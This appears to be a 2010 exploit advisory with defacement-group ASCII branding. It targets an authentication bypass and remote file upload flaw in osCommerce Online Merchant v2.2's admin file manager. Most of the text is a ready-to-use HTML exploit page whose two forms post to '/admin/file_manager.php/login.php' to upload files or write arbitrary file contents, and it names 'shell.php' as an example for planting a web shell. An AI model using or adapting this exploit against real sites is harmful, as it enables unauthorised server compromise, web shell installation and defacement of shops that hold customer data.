_______ _ _ | ___ \| | | | (_) | |_/ /_____ _____ | |_ _| |_ _____ __ |// _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ | |\ \__/\ V / (_) | | |_| | |_| | (_) | | | | \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| _______________ |_ _||_||_| | | _____ _ _ __ ___ | |/' || |_| | | |/ _ \/ _` | '_ ` _ \|/| |\____ | | |__/ (_| | | | | | | \ |_/ /.___/ / \_/\___|\__,_|_| |_| |_|\___/ \____/ DEFACEMENT it's for script kiddies... _____________________________________________________________ [$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload [$] Date: 30-05-2010 [$] Author: MasterGipy [$] Email : mastergipy [at] gmail.com [$] Bug : Remote File Upload [$] Vendor: http://www.oscommerce.com [$] Google Dork : n/a [%] vulnerable file: /admin/file_manager.php [REMOTE FILE UPLOAD VULNERABILITY] [$] Exploit: <html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="http://<--CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="http://<--CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> <input name="submit" type="submit" value=" Save " > </form> </html> [=] Thanks toFlyff666 for the original exploit: - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass [§] Greetings from PORTUGAL ^^
体验盒子
